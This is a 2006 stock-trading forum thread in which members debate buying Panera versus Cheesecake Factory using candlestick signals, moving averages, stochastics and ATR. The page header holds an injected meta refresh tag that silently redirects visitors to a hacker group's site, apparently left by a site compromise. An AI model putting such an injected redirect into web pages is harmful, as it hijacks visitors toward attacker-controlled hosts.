Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - PNRA
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

PNRA

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
mesa613

PostPosted: Wed Apr 19, 2006 11:20 pm    Post subject: PNRA Reply with quote

PNRA looks real tempting to me right now, but I'm not quite sure whether to jump in tommorrow morning.

On one hand, PNRA seems to have formed a kicker signal that went past both what appears to be some resistance at $70 and flew past the 100 day MA. One the cautious side of things, it's still under the 50 day MA and the company is making their earnings announcement on Tuesday and that type of thing can always a wildcard in my book no matter how rosy the picture.

Any thoughts?
Bluto

PostPosted: Wed Apr 19, 2006 11:38 pm    Post subject: Reply with quote

That's a powerful looking Kicker there on Wednesday. Fast Stochastics shows it as comfortably oversold, and volatility looks ok. It's been in a trading range since around December 05. Bollinger Bands look like it could run up all the way to the $75.50 - $76.00 range. Specialty Eateries group has above average performance. However, considering the high share price of Panera and how hot the market is right now, you could buy two shares of a high momentum stock with room to run in the $35/share range and double your profit. I'd look at the Basic Materials sector (Mining, Aluminum, Precious Metals, etc.), the Energy Sector, or the Industry Sector (Heavy Machinery, Agricultural Equip., Small Tools, etc.) for some great picks right now. Panera doesn't look like it has much mojo to run anywhere. Wink
mesa613

PostPosted: Thu Apr 20, 2006 12:03 am    Post subject: Reply with quote

So you're saying I should eat CAKE then? It is at about $35 right now afterall and the chart doesn't look half bad in my humble opinion. Laughing

Actually CAKE is also on my watch list for tommorrow, but between the two the signal on CAKE just doesn't look as "clean" as PNRA's signal to me for some reason. Oh well, only time will tell. Cool

You really think the basic mineral sector is at a good entry point at this stage? Shocked
Bluto

PostPosted: Thu Apr 20, 2006 12:16 am    Post subject: Reply with quote

mesa613 wrote:
So you're saying I should eat CAKE then? It is at about $35 right now afterall and the chart doesn't look half bad in my humble opinion. Laughing

Actually CAKE is also on my watch list for tommorrow, but between the two the signal on CAKE just doesn't look as "clean" as PNRA's signal to me for some reason. Oh well, only time will tell. Cool

You really think the basic mineral sector is at a good entry point at this stage? Shocked

The CAKE looks very choppy to me. It's another one that's been in a trading range, and it looks like it's venturing to the downside now. Take a look at the MA's...they're all heading down. I don't know what type of trader you are, but if you're looking for a short-term pop and run, you might get it with this one, but it ain't a keeper for sure. Take a look at some of the stocks in those sectors I mentioned. Many have gotten off to some great sustained upwards growth and have beautiful charts. Now's the time to jump on one and let the profits run. Take a look at the charts for ZOLT, ROCK, and NPO just to name a few. This is just my opinion.
S2

PostPosted: Thu Apr 20, 2006 12:40 am    Post subject: Reply with quote

Hmmm, it's interesting to hear other peoples opinions and see what they find attractive; here's my 2. ROCK, ZOLT and NPO all have their stochastics in the overbought area and have good long run ups; how much longer will their runs go? I think they may be about ready to take a respit.

PNRA has a nice chart, yes has a kicker, however, it touched the 50 and backed off, have to see what tomorrow brings. Also it has a 10-day ATR of $1.69

CAKE came up on my scans and made it to my list of possibles; assuming the same dollar amounts spent on either PNRA or CAKE you would obviously get twice as many shares of CAKE as PNRA. The ATR of CAKE is $0.96, so for the price it is covering more ground than PNRA. Both of them have stochs just coming out of OS. CAKE has possible resistance in the 35.41 area and the 50dMA to contend with just under 36.

Interesting interesting.
Bluto

PostPosted: Thu Apr 20, 2006 9:10 am    Post subject: Reply with quote

Yes, some of those high momentum stocks like ZOLT are definitely in an overbought status and are no doubt due for a pullback "breather". However, even though Stochastics shows overbought, that indicator becomes completely useless with strongly trending stocks. I find that it works best with low volatility and trading range bound stocks. With strongly trending stocks, MACD is probably the better bet, although my personal favorites are RSI, ADX, DMI, MSI and Bollinger Bands. As for these momentum stocks, the best thing to do is try to buy in after a pullback and let it ride, waiting for intermediate/long-term reversal signs like lower highs, etc. Very Happy
russjackel

PostPosted: Sat Apr 22, 2006 7:26 pm    Post subject: ATR Reply with quote

sorry for asking a stupid question but what is ATR ? not familiar with the term. thanks
mesa613

PostPosted: Sat Apr 22, 2006 9:37 pm    Post subject: Reply with quote

ATR is a volatility indicator, I think. I imagine Investopedia probably has a more exact definition on their site.

Cheers.
S2

PostPosted: Sun Apr 23, 2006 6:11 pm    Post subject: Reply with quote

ATR is Average True Rang, High to Low. A higher priced stock licke PNRA, AAPL, SNDK has an ATR in dollars; a $5 stock typically has an ATR measured in cents.

One evalutaion you can make if you have two similar priced stocks to choose from and both of them look equally appealing to you the one with the higher 5 or 10 ATR may sway you to go with it due to the larger spread. It's just another tool to consider.
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: